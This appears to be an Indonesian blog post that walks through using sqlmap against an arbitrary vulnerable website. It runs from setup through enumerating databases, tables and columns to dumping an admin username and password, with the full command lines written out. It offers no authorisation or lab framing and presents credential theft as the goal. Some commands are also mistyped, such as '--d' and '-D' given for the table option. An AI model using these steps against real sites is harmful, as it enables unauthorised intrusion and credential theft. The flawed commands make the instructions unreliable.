
2.buat yang belum punya program python monggo silahkan download download yang 2.3.7
3.Kalo udah selsai , download SQLMAP python nya. lalu simpan di direktori PC teman "Bebas mau di taruh dimana aja D/C "
4.Buka dan tujulah ke direktori penyimpanan anda tadi "Contoh"
perintah tuju direktori dengan CMD :
d: <<< untuk menuju data d
c: <<< untuk menuju data c
cd : menggali lebih dalam direktori.Misal nya saya, menyimpan di D:\Data-gw\Penetrasi\sqlmap . makanya saya harus menggali nya dengan perintah cd "sebagai contoh : cd data-gw ENTER, cd penetrasi ENTER , cd sqlmap ENTER.
Lihat gambar berikut ini

![[Image: TujuDirektoridenganCmd.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbV8XJuZsIiZD2Qs4RknXdvktWjsiiOehyphenhyphenL1GGfgt1qfciafwIS7-9020lHpScXonYHTncrGEfAOUqVMFDodnaYksDWow-vYq4yvf-RioSn2w4n1jx3gNoGjsWzFeKC1t2g2jDs3TexMY/s1600/TujuDirektoridenganCmd.png)
Mudahkan

5.Nah kalo sudah di tuju direktori nya,Silahkan masukan syntax berikut ini : sqlmap.py -u SiteVuln --dbs ENTER (Untuk mencari database) "Maka akan jadi seperti gambar di bawah ini"
Mohon maaf , kalo gambar nya BWK :
![[Image: MencariDbs.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCtZfWeSD0M00Agn86rYjcAwHhxlEvG-8YdHpHMRYscwQGkwjT1DjospIJVRbcjS73A2xd4P5LXsASRN9p7SRSGfQANsd3ysyeWyASII2un52v31chqp8iY9Jp7w94QT0oPdFBhLlWzL8/s1600/MencariDbs.png)
6.Sekarang kita menggali tabel dari Dbs , " BUG " , masukan perintah : sqlmap.py -u SiteVuln --d database nya --tables
ENTER , Nah Munculkan banyak kan tuh

untuk lebih jelasnya Lihat gambar di bawah ini :
![[Image: EksekusiUser.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXiGB_bAhvv1e36OkZ7DInf3Iqiih7yztJNQfh2Ij99NEt5pyXgq9mDsXa9fvMDgQ9sfnJZKhYs8K7d6nuDXVEtpMnOCbIS8-8yQsZzJUjzRBYkRNNtCL998boc3gkQF_znIckHJzEWqQ/s1600/EksekusiUser.png)
7.Selanjut nya adalah, menemukan kolom nya.Silahkan masukan sintaks nya lagi :
sqlmap.py -u SiteVuln -D DataBase nya -D tabel nya --columns ,, Oke kalo udah Enter lagi , dan lihat hasil nya :
![[Image: udah%2Bmenemukanuser%252Bpassadmin.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_8AxcO4cK5sO4qaqWcnyFp0dIP5JNi7Q6Pgz_kVlGgm6Ntf_uG0r6nkOrrbfPmMKos-9dLezhQiDLwPmgFwtmVv6eqff5Y3HbPnh3lI5PurX0gxHBaPj8oM-dlz8bHo__XlfOgOx_uag/s1600/udah+menemukanuser%252Bpassadmin.png)
Ea kk , jangan berbahagia dulu


8.Melihat isi dari kolom tersebut

sqlmap.py -u SiteVuln -D Nama databasenya -T Nama tablenya -C nama kolomnya --dump
Sebagai contoh gambar di atas , saya akan mengambil username nya password nya belakangan

![[Image: Berhasil%2Bmendapatkan%2Busername%252Bpa...Badmin.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5ad_mntm2ib61Wala7q8KDkaVw3LA8i0iDfT4vIlA_2FCU_HxQT01ew3q0Yie14f4FnDBKAd6jwo23eVU6G0Do4DX1zH1qt8VAvaxUHLUqfO8yFkGR-fNqpYIeUfUzVQikmKdafn905w/s1600/Berhasil+mendapatkan+username%252Bpassword+admin.png)
SUMBER
0 comments:
Post a Comment